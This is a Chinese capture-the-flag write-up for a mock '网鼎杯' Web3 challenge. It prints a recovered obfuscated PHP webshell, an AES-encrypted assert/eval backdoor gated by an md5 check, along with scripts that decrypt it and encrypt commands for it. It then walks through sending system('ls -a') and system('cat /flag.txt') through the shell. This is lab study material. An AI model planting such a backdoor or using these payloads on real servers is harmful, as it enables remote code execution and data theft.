241026 网鼎杯模拟 Web3

尝试扫描目录,可找到wwwroot的备份文件,我们可以将文件下载。

下载任意一个备份文件,解压文件。

找到特征最明显的文件(其他文件名均以大写字母开头,只有该文件名以小写字母开头)
"describedssTest.php",将其代码格式化后可得:

<?php error_reporting(0);
// Sample under analysis (the file recovered from the backup archive).
// error_reporting(0) above turns off all PHP error reporting, so failed
// decodes/decrypts in this file produce no visible warnings.
header('Content-type: text/html; charset=utf-8');
// $p8: 32-character hex string. It is passed as the key argument to d() and
// e() below; the decrypted $d8 payload shown later on this page also compares
// md5($_GET['id']) against it.
$p8 = '3b7430adaed18facca7b799229138b7b';
// $a8 / $d8: encrypted blobs in the format d() expects (base64 applied twice
// around IV + ciphertext). Per the decryption output on this page, $a8
// decrypts to a function name and $d8 to an eval() stub.
$a8 = 'TURNeU9UWTBOelUwTmprd05UUTVOR0ZLV1ZwdU9XSkZORmh2WnpoS1RrNW1jRTFrTkdjOVBRPT0=';
$d8 = 'TURNeU9UWTBOelUwTmprd05UUTVOR012V1c5cVJXNXBkWEJyZDFsemJsQlpNMmRITjNaYWVFVnFPVWRqVnpoWlUyNXZNbmhDU21jd2RHTkxRazF2U1hvMU9FNUNWM2RNUjFWYVJuVnBiV3czUlVwUldFMTFhakp2VjJKS1NIVlJUMU5UYjNoSWExUk5hMlZXY21OdlRuaHVRMjlsVkV4aEwzbGpQUT09';
// $v8: 16-character string read via $GLOBALS['v8'] as the fixed CBC IV in
// both e() and d().
$v8 = '0329647546905494';
/**
 * Encrypts $D with AES-128-CBC under key $K and the fixed IV held in
 * $GLOBALS['v8'], then wraps the result as base64(base64(IV . ciphertext)).
 *
 * NOTE(review): the IV is static and is also shipped in clear as a prefix,
 * so every message under the same key reuses it.
 *
 * @param string $D Plaintext to encrypt.
 * @param string $K Key string handed to openssl_encrypt().
 * @return string Double-base64 text in the format d() consumes.
 */
function e($D, $K)
{
  $cipher = 'aes-128-cbc';
  // options = 0: openssl_encrypt() returns base64 text, not raw bytes.
  $encrypted = openssl_encrypt($D, $cipher, $K, 0, $GLOBALS['v8']);
  // Prefix the IV string, then base64-encode twice.
  $result = base64_encode($GLOBALS['v8'] . $encrypted);
  $result = base64_encode($result);
  return $result;
}
/**
 * Reverses e(): base64-decodes $D twice, drops the leading IV-length bytes,
 * and AES-128-CBC decrypts the remainder with key $K.
 *
 * The prefix that is skipped is not used for decryption; the IV always
 * comes from $GLOBALS['v8'].
 *
 * @param string $D Double-base64 input.
 * @param string $K Key string handed to openssl_decrypt().
 * @return string|false Plaintext, or false when openssl_decrypt() fails.
 */
function d($D, $K)
{
  $cipher = 'aes-128-cbc';
  $decodedData = base64_decode(base64_decode($D));
  // Skip the IV prefix (openssl_cipher_iv_length() bytes for this cipher).
  $encryptedData = substr($decodedData, openssl_cipher_iv_length($cipher));
  // options = 0: the remaining data is treated as base64 ciphertext.
  $decrypted = openssl_decrypt($encryptedData, $cipher, $K, 0, $GLOBALS['v8']);
  return $decrypted;
}
// $a8 is replaced by its decrypted value and then used as a function name.
// The decryption output on this page shows that value is "assert", so no
// literal eval/assert call appears anywhere in this file's plaintext.
$a8 = trim(d($a8, $p8));
// Buffer output so whatever the invoked code prints can be captured.
ob_start();
// Variable-function call with the decrypted $d8 string as its argument.
// NOTE(review): assert() only evaluates a string argument as code on
// PHP < 8, so this stage presumably targets an older runtime; confirm
// against the host's PHP version.
// Review indicators visible here: a call through a decrypted variable,
// openssl_decrypt over nested base64_decode, and error_reporting(0).
$a8(trim(d($d8, $p8)));
$O = ob_get_contents();
ob_end_clean();
// The captured output leaves the server only in e()'s encrypted form.
echo e($O, $p8);

编写 $a8 和 $d8 的解密脚本

<?php 
// Analysis helper: decrypts the two embedded blobs of the sample and prints
// them. It only prints the plaintext; nothing decrypted is executed.
// NOTE(review): error_reporting(0) also hides decode/decrypt warnings in this
// helper, and the output is sent as text/html; running it from the CLI keeps
// the decrypted sample text from being interpreted by a browser.
error_reporting(0); 
header('Content-type: text/html; charset=utf-8'); 
// Key and IV, copied from the sample
$p8 = '3b7430adaed18facca7b799229138b7b'; 
$v8 = '0329647546905494'; 
// Decryption function
/**
 * Decrypts one blob in the sample's wire format.
 *
 * The input is base64-decoded twice, the leading IV-length bytes are
 * discarded, and the rest is AES-128-CBC decrypted with key $K. The IV is
 * always taken from $GLOBALS['v8'], not from the discarded prefix.
 *
 * @param string $D Double-base64 input.
 * @param string $K Key string handed to openssl_decrypt().
 * @return string|false Plaintext, or false when openssl_decrypt() fails.
 */
function d($D, $K)
{
    $algo = 'aes-128-cbc';
    $inner = base64_decode($D);
    $blob = base64_decode($inner);
    // Everything after the IV-sized prefix is the base64 ciphertext.
    $body = substr($blob, openssl_cipher_iv_length($algo));

    return openssl_decrypt($body, $algo, $K, 0, $GLOBALS['v8']);
}
// Decrypt the contents of $a8 and $d8 (blobs copied verbatim from the sample)
$a8_encrypted = 
'TURNeU9UWTBOelUwTmprd05UUTVOR0ZLV1ZwdU9XSkZORmh2WnpoS1RrNW1jRTFrTkdjOVBRPT0='; 
$d8_encrypted = 
'TURNeU9UWTBOelUwTmprd05UUTVOR012V1c5cVJXNXBkWEJyZDFsemJsQlpNMmRITjNaYWVFVnFPVWRqVnpoWlUyNXZNbmhDU21jd2RHTkxRazF2U1hvMU9FNUNWM2RNUjFWYVJuVnBiV3czUlVwUldFMTFhakp2VjJKS1NIVlJUMU5UYjNoSWExUk5hMlZXY21OdlRuaHVRMjlsVkV4aEwzbGpQUT09'; 
// Decryption results
$a8_decrypted = d($a8_encrypted, $p8); 
$d8_decrypted = d($d8_encrypted, $p8); 
// Print only; the decrypted strings are never passed to eval/assert here.
echo "解密后的 \$a8 内容: " . $a8_decrypted . "\n"; 
echo "解密后的 \$d8 内容: " . $d8_decrypted . "\n"; 
?>

输出的结果为

解密后的 $a8 内容: assert 
解密后的 $d8 内容: @eval("if(md5(@\$_GET['id'])===\$p8){@eval(trim(d(\$_POST['d'],\$p8)));}") 

分析代码可知:需要通过 query 参数传入 id,且 id 的 md5 值必须等于 $p8;通过 md5 爆破可得
id=04c50eb4bc04c76311d03550ee2c1b71
。当条件为 TRUE 时,程序会解密 POST 参数 d 并执行其内容,因此我们需要传入加密后的 d 参数。


编写加密和解密的代码如下

加密:

<?php 
// Helper that reuses the sample's own e() so text can be put into the
// double-base64 AES format that the sample's d() accepts.
error_reporting(0); 
header('Content-type: text/html; charset=utf-8'); 
// Key copied from the sample.
$p8 = '3b7430adaed18facca7b799229138b7b'; 
// $a8 and $d8 are carried over from the sample but are not used below.
$a8 = 
'TURNeU9UWTBOelUwTmprd05UUTVOR0ZLV1ZwdU9XSkZORmh2WnpoS1RrNW1jRTFrTkdjOVBRPT0='; 
$d8 = 
'TURNeU9UWTBOelUwTmprd05UUTVOR012V1c5cVJXNXBkWEJyZDFsemJsQlpNMmRITjNaYWVFVnFPVWRqVnpoWlUyNXZNbmhDU21jd2RHTkxRazF2U1hvMU9FNUNWM2RNUjFWYVJuVnBiV3czUlVwUldFMTFhakp2VjJKS1NIVlJUMU5UYjNoSWExUk5hMlZXY21OdlRuaHVRMjlsVkV4aEwzbGpQUT09'; 
// Fixed IV copied from the sample; e() and d() read it via $GLOBALS['v8'].
$v8 = '0329647546905494'; 
 
/**
 * Produces the sample's wire format for $D.
 *
 * $D is AES-128-CBC encrypted with key $K and the fixed IV from
 * $GLOBALS['v8']; the IV string is prepended to the base64 ciphertext and
 * the whole thing is base64-encoded twice.
 *
 * @param string $D Plaintext to encrypt.
 * @param string $K Key string handed to openssl_encrypt().
 * @return string base64(base64(IV . base64 ciphertext)).
 */
function e($D, $K)
{
    $iv = $GLOBALS['v8'];
    // options = 0 makes openssl_encrypt() return base64 text.
    $ciphertext = openssl_encrypt($D, 'aes-128-cbc', $K, 0, $iv);

    return base64_encode(base64_encode($iv . $ciphertext));
}
 
/**
 * Inverse of e(): unwraps two layers of base64, skips the IV-sized prefix,
 * and AES-128-CBC decrypts what remains with key $K.
 *
 * The IV used is $GLOBALS['v8']; the prefix carried in the data is ignored.
 *
 * @param string $D Double-base64 input.
 * @param string $K Key string handed to openssl_decrypt().
 * @return string|false Plaintext, or false when openssl_decrypt() fails.
 */
function d($D, $K)
{
    $mode = 'aes-128-cbc';
    $unwrapped = base64_decode(base64_decode($D));
    $prefixLen = openssl_cipher_iv_length($mode);
    $payload = substr($unwrapped, $prefixLen);

    return openssl_decrypt($payload, $mode, $K, 0, $GLOBALS['v8']);
}
 
// The string literal is a placeholder (it reads "enter the text to encrypt
// here"); the echoed value is the double-base64 form produced by e().
$c = e("此处输入加密文本", $p8); 
echo $c;
?>

解密:

<?php 
// Helper that reuses the sample's own d() to turn an e()-formatted response
// back into plaintext. It prints the result and executes nothing.
error_reporting(0); 
 
header('Content-type: text/html; charset=utf-8'); 
 
// Key copied from the sample.
$p8 = '3b7430adaed18facca7b799229138b7b'; 
 
// $a8 and $d8 are carried over from the sample but are not used below.
$a8 = 
'TURNeU9UWTBOelUwTmprd05UUTVOR0ZLV1ZwdU9XSkZORmh2WnpoS1RrNW1jRTFrTkdjOVBRPT0='; 
 
$d8 = 
'TURNeU9UWTBOelUwTmprd05UUTVOR012V1c5cVJXNXBkWEJyZDFsemJsQlpNMmRITjNaYWVFVnFPVWRqVnpoWlUyNXZNbmhDU21jd2RHTkxRazF2U1hvMU9FNUNWM2RNUjFWYVJuVnBiV3czUlVwUldFMTFhakp2VjJKS1NIVlJUMU5UYjNoSWExUk5hMlZXY21OdlRuaHVRMjlsVkV4aEwzbGpQUT09'; 
 
// Fixed IV copied from the sample; e() and d() read it via $GLOBALS['v8'].
$v8 = '0329647546905494'; 
 
/**
 * Encrypts $D the way the sample does: AES-128-CBC with key $K and the
 * fixed IV from $GLOBALS['v8'], IV string prepended, base64 applied twice.
 *
 * @param string $D Plaintext to encrypt.
 * @param string $K Key string handed to openssl_encrypt().
 * @return string base64(base64(IV . base64 ciphertext)).
 */
function e($D, $K)
{
    $fixedIv = $GLOBALS['v8'];
    $sealed = openssl_encrypt($D, 'aes-128-cbc', $K, 0, $fixedIv);
    $onceEncoded = base64_encode($fixedIv . $sealed);

    return base64_encode($onceEncoded);
}
/**
 * Decrypts text in the sample's format: two base64 layers are removed, the
 * IV-sized prefix is dropped, and the remainder is AES-128-CBC decrypted
 * with key $K and the IV in $GLOBALS['v8'].
 *
 * @param string $D Double-base64 input.
 * @param string $K Key string handed to openssl_decrypt().
 * @return string|false Plaintext, or false when openssl_decrypt() fails.
 */
function d($D, $K)
{
    $algo = 'aes-128-cbc';
    $decoded = base64_decode(base64_decode($D));
    // Drop the IV-sized prefix; the IV itself comes from the global.
    $ciphertext = substr($decoded, openssl_cipher_iv_length($algo));

    return openssl_decrypt($ciphertext, $algo, $K, 0, $GLOBALS['v8']);
}
// The string literal is a placeholder (it reads "enter the text to decrypt
// here"); d() returns false, which echoes as an empty string, if it fails.
$c = "此处输入要解密的文本"; 
echo d($c, $p8); 
?>

使用 HackBar 插件发包,依次加密以下内容并发包

  • system("ls -a");
  • system("ls -a /");

通过遍历根目录,发现特征文件flag.txt

然后加密 system("cat /flag.txt"); 并传参,将返回内容解密后即可获得 flag
